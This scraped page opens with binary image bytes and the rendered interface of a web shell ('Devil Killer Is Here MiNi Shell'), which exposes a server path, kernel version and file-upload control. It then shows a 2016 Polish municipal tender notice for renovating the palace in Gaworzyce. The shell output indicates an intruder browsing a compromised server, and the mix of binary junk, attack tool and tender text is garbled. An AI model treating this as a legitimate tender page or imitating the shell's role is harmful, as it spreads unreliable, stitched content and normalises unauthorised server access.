JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160509/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160509/115236-N-2016.html

<p class="kh_header"><b>Gaworzyce: Remont Pałacu w Gaworzycach - 2 zadania</b><br>
<b>Numer ogłoszenia: 115236 - 2016; data zamieszczenia: 09.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gaworzyce , ul. Okrężna 85, 59-180 Gaworzyce, woj. dolnośląskie, tel. 076 8316285, faks 076 8316286.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.gaworzyce.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont Pałacu w Gaworzycach - 2 zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia wraz z jego opisem:
1.Remont Pałacu w Gaworzycach - 2 zadania. Zakres robót obejmuje kompleksowe wykończenie 
I piętra Pałacu w Gaworzycach wraz z przebudową schodów z parteru na piętro i uzupełnienie oświetlenia w korytarzu na parterze. Zaawansowanie robót w tej części pałacu to: wykonane stropy 
ze sztukateriami we wszystkich pomieszczeniach oraz tynki w pom. 2.5-2.9 wraz z częścią korytarza 2.16, wykonana instalacja centralnego ogrzewania z grzejnikami w pom. 2.5-2.9.
Zadanie 1 pn.: Prace konserwatorskie i restauratorskie wnętrza pałacu w Gaworzycach - odtworzenie tynków wewnątrz budynku - etap IV. Ze względu na planowane współfinansowanie zadania ze środków budżetu województwa dolnośląskiego wyłącza się 302,65 m2 tynków I piętra pałacu, w zakres robót wchodzą między innymi:
	przygotowanie i naprawa podłoża, 
	naprawa pęknięć w murach z cegły gotyckiej,
	naprawa powierzchni murów zabytkowych,
	przygotowanie i naprawa podłoża - zamocowanie siatki zbrojącej,
	zabezpieczenie okien folią,
	wyrównanie podłoża zaprawą,
	impregnacja biobójcza ręczna,
	impregnacja przeciwsolna,
	położenie tynków renowacyjnych na ścianach,
	malowanie tynków renowacyjnych - aplikacja ręczna.
Dokumentacja wykonana przez KRASCH Usługi Budowlane i Konserwatorskie. Wycena Nieruchomości, 67-200 Głogów, M. Gomółki 24 pn.: Remont Pałacu w Gaworzycach - wnętrza Etap III - (Załącznik nr 3)
Zadanie 2 pn.: Remont Pałacu w Gaworzycach - I piętro pałacu, wykonanie kompleksowe remontu I piętra pałacu, w zakres robót wchodzi między innymi:
	wykonać zasypki przestrzeni pach keramzytem aż do wysokości podłoża pod posadzki (z wyłączeniem pom. 2.6 oraz części korytarza), wykonać podłoże z betonu wraz z wykonaniem izolacji przeciwwilgociowej poziomej z folii szerokiej na sucho, wyrównać podłoża pod posadzki do jednego poziomu,
	w części przy świetliku od strony wschodniej wykonać węzeł sanitarny. Ściany wykonać wyłącznie z cegieł kl. 150 na zaprawie cem-wap. na ścianach wykonać glazury do wysokości 210 cm. Posadzkę z terakoty dopasować do poziomu piętra,
	do pom. socjalnego 2.15 doprowadzić wodę i odprowadzić kanalizację wraz z zamontowaniem podgrzewacza przepływowego pod zlewozmywak, 
	udrożnić, przemurować i oczyścić istniejące kominy spalinowe, które będą wykorzystywane do wentylacji grawitacyjnej pomieszczeń, 
	wykonać poszycie istniejących kominów i zastosować rękawy foliowe lub rury Spiro do pomieszczeń wentylowanych, do każdego osobno. Rury umieścić w istniejących przewodach dawnych kominów aż ponad dach,
	zauważone pęknięcia ścian należy poszyć cegłą lub wzmocnić poprzez wstawienie prętów stalowych żebrowanych O8 w co drugą spoinę na głębokość 5-6 cm co najmniej 50 cm poza pęknięcie z obu stron, w miejscach skorodowanych ścian powierzchniowo na głębność większą niż 5 cm założyć siatki podtynkowe,
	wykonać tynki ścian po uprzednim naprawieniu i poszyciu. Do wykonania tynków stosować gotowe zaprawy wapienne systemowe wg zasady szpryc 50/50, narzut min. 1,5 cm, warstwa wierzchnia do 1 cm. Gładzie wykonać wyłącznie ze szpachli czysto wapiennych,
	w pomieszczeniu 2.6 wykonać listwy profilowane ciągnione systemem warsztatowym,
	malowanie wnętrz wyłącznie farbami mineralnymi krzemianowymi oddychającymi 
o wysokiej paroprzepuszczalności w kolorach pastelowych jasnych po uzgodnieniu 
z inwestorem i autorami PB,
	stolarka okienna jest nowa, wymaga jednak wykonania parapetów i zakupu klamek. Parapety wykonać z drewna mahoniowego jak okna. Parapet powinien wystawać co najmniej 5 cm poza lico ściany, parapety i klamki  jak w pomieszczeniach wyremontowanych,
	stolarkę drzwiową wykonać jako indywidualną płycinową z wyłogami jak w pomieszczeniach wyremontowanych,
	podłogi w korytarzach wykonać z płytek terakotowych o wymiarach 15x15 cm w kolorach beżowo-popielatym i grafitowym podobnym jak zachowane we fragmentach, klasa ścieralności IV, antypoślizgowość R12-13, np. Villeroy-Bosch lub równoważne, po uprzednim rozebraniu historycznych i nowych płytek na I piętrze pałacu,
	schody z parteru na piętro należy uzupełnić i dobudować stopnie do wysokości podłogi właściwej na piętrze z okładziną kamienną (z piaskowca lub granitu - do uzgodnienia 
z inwestorem podczas realizacji) o gr. 4 cm,
	parapety zewnętrzne tarasowe wymienić na granitowe jak wykonane przy wejściu głównym do pałacu,
	wykonanie i montaż balustrady schodowej o charakterze zabytkowym ze stali płaskiej, słupki kwadratowe, pochwyt ze stali płaskiej przekuwanej w profil, słupki dołem zakończone rozetami, 
	wykonanie pełnej instalacji teletechnicznej i elektrycznej i spięcie z istniejącą,
	wykonanie gniazd wtykowych i oświetlenia I piętra wraz z uzupełnieniem parteru (korytarz 1.18, 1.15) o 3 kinkiety, 4 małe żyrandole i jedno wyjście ewakuacyjne,
	do pomieszczenia 2.17 prowadzone będą instalacje teletechniczne wraz z montażem rozdzielni, która będzie pełniła funkcję serwerowni,
	wykonanie parkietów dębowych w pomieszczeniach, poza pomieszczeniem 2.6 gdzie przewidziany jest parkiet pałacowy taflowy 63/63/3,2 cm parkiet mozaikowy,
	zakup (z wyjątkiem dla pom. 2.5-2.9) i montaż grzejników,
	do pomieszczenia socjalnego (pom. 2.15) zakupić i zamontować meble kuchenne pod zabudowę z ciągiem roboczym zawierającym płytę grzewczą elektryczną dwumiejscową, lodówkę wielkości szafki dolnej, zlew jednokomorowy z ociekaczem i baterią, mikrofalówka (całość w zabudowie) - szafki dolne i górne na ścianie o długości 3m, stolik składany ścienny o wymiarach w przedziale 70/90 - 50/70 cm, 2 krzesła składane.
Dokumentacja wykonana przez KRASCH Usługi Budowlane i Konserwatorskie. Wycena Nieruchomości, 67-200 Głogów, M. Gomółki 24 pn.: Remont Pałacu w Gaworzycach - wnętrza Etap III - (Załącznik nr 3).
Dodatkowe informacje do opisu przedmiotu zamówienia:
	Żyrandole i kinkiety uwzględnić jak istniejące na parterze pałacu. Zdjęcia - załącznik nr 3. Wielkość i ilość ramion pokazana w projekcie.
	Instalacja zasilająca pomiędzy tablicami T-3 i T-4 - należy uwzględnić w wycenie oferty. Należy wykonać rozdzielnie elektryczne na piętrze. Załączony przedmiar robót ma charakter pomocniczy przy sporządzaniu oferty. 
	Brak dokumentacji na instalacje teletechniczne - przyjąć ilości podane w przedmiarze. Miejsce ułożenia instalacji do uzgodnienia z Inwestorem przed przystąpieniem do robót przez wybranego wykonawcę.
	Wymiary oraz typ i rodzaj grzejników - zgodnie z załączonym Rys. rzut I piętra (załącznik nr 3 - instalacja centralnego ogrzewania).
	Instalacja p.poż. jest wykonana, zamontowano hydranty typu HW-250-B w szafkach hydrantowych. Należy w wycenie uwzględnić zakup 6 gaśnic proszkowych 3 kg.
	Instalacja kanalizacyjna - Rys. kanalizacja I piętro (załącznik nr 3) projektu dotyczy wykonania kanalizacji sanitariatów. Dodatkowo zgodnie z zapisami opisu przedmiotu zamówienia siwz wymaga się również doprowadzić wodę i odprowadzić kanalizację z pom. socjalnego. Ze względu na konieczność połączenia kanalizacji z pom. socjalnego z pionem 
w sanitariatach i brakiem możliwości zachowania spadków zaleca się przyjęcie pompy 
z rozdrabniaczem pod zlewozmywak kuchenny.
	Należy zamontować armaturę łazienkową i osprzęt dobrej jakości, z przeznaczeniem 
do obiektów użyteczności publicznej.
	Wykonanie instalacji wodociągowej do wc oraz montaż pojemnościowego podgrzewacza wody - należy uwzględnić w wycenie oferty. Załączony przedmiar robót ma charakter pomocniczy przy sporządzaniu oferty. 
	Zakup i montaż szafek kuchennych, stolika, krzeseł, płyty grzewczej, lodówki oraz mikrofalówki - należy uwzględnić w wycenie oferty. Załączony przedmiar robót ma charakter pomocniczy przy sporządzaniu oferty.
	Zbrojenie warstw wyrównawczych z zaprawy cementowej siatką stalową do zbrojenia posadzek - uwzględnić w przypadku uznania do wykonania tych robót przez wykonawcę. 
	W wycenie należy uwzględnić zakup 35 szt. klamek do okien.
	W zakresie zamówienie znajduje się przebudowa kominów oraz wykonanie instalacji wentylacji - należy przyjąć około 80 mb przewodów z rękawami foliowymi.
	Klasę parkietu dębowego należy przyjąć jako I kl. Natur.
	Wzór parkietu taflowego do uzgodnienia z Zamawiającym podczas realizacji zadania. Parkiet taflowy nie może być mniejszej grubości niż 22 mm.
	W pozycjach 53 i 99 przedmiaru należy przyjąć parkiet jak w pozostałych pozycjach, tj. 60 x 4 x 2,2.
	W pomieszczeniach 2.7; 2.8; 2.9; 2.1-2.4; 2.10-2.19 Zamawiający dopuszcza zastosowanie parkietu dębowego w rozmiarze 600x100x22 mm kl. I Natur przy zachowaniu warstwy ścieralnej min 1 cm.
	Parapety należy wykonać z drewna mahoniowego o szerokości min 40 cm (powinien wystawać co najmniej 5 cm poza lico ściany) i gr. 4 cm  z kapinosem na 6 cm.
	Należy wykonać dwa parapety zewnętrzne granitowe o szerokości min 40 cm i gr. 3 cm (pom. 2.1).
2. Jeżeli gdziekolwiek w opisie przedmiotu zamówienia Zamawiający użył konkretnych nazw materiałów lub nazw producentów lub innych opisów, które wskazywałyby na konkretną rzecz lub konkretnego producenta, czy dostawcę oznacza to zapis przykładowy (wskazanie na typ/model). Zamawiający dopuszcza zaoferowanie rzeczy równoważnych, tzn. o porównywalnych parametrach techniczno-jakościowych, takich, które posiadają parametry nie gorsze od wskazanych. Podane 
w opisach nazwy własne nie mają na celu naruszenia ustawy Prawo zamówień publicznych, a mają 
za zadanie jedynie doprecyzowanie oczekiwań jakościowych i technologicznych Zamawiającego.
3. Zaleca się wizję lokalną miejsca inwestycji celem sprawdzenia terenu budowy oraz warunków związanych z wykonaniem prac będących przedmiotem przetargu oraz w celu uzyskania dodatkowych informacji koniecznych i przydatnych do oceny prac, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy. 
4. Wszystkie nakłady do wykonania całości zamówienia: robocizna, materiały i sprzęt leżą po stronie wykonawcy i ich wartość należy uwzględnić w cenie ofertowej, która w niniejszym postępowaniu ma charakter wynagrodzenia ryczałtowego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.45.30.00-7, 45.41.00.00-4, 45.32.00.00-6, 45.43.00.00-0, 45.44.00.00-3, 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium: 18.000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków 
w tym zakresie na podstawie oświadczenia wykonawcy - formularz B</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zdolny do należytego wykonania zamówienia to taki Wykonawca, który wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał:
- co najmniej 2 zamówienia o wartościach powyżej 300.000,00 zł brutto każde obejmujące wykonanie robót budowlanych z zakresu budowy, przebudowy, remontu w obiekcie zabytkowym.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia wykonawcy - formularz D.
Potencjał kadrowy: Wykonawca zdolny do należytego wykonania zamówienia to taki, który wykaże, że do wykonania zamówienia dysponuje kierownikiem:
a)	w branży konstrukcyjno-budowlanej bez ograniczeń,  wpisanym na listę członków PIIB oraz biorącym udział przez co najmniej 18 miesięcy w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru, potwierdzonym zgodnie z art. 37g ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (t.j. Dz. U. z 2014 r. poz. 1446 z późn. zm.), 
b)	w branży instalacyjno- inżynieryjnej w zakresie instalacji sanitarnych,
c)	w branży elektrycznej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia wykonawcy - formularz D.
Potencjał kadrowy: Wykonawca zdolny do należytego wykonania zamówienia to taki, który wykaże, że do wykonania zamówienia dysponuje kierownikiem:
a)	w branży konstrukcyjno-budowlanej bez ograniczeń,  wpisanym na listę członków PIIB oraz biorącym udział przez co najmniej 18 miesięcy w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru, potwierdzonym zgodnie z art. 37g ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (t.j. Dz. U. z 2014 r. poz. 1446 z późn. zm.), 
b)	w branży instalacyjno- inżynieryjnej w zakresie instalacji sanitarnych,
c)	w branży elektrycznej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków 
w tym zakresie na podstawie oświadczenia wykonawcy - formularz B.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - okres gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Istotne postanowienia umowy określa projekt umowy, stanowiący załącznik nr 2 do niniejszej SIWZ.
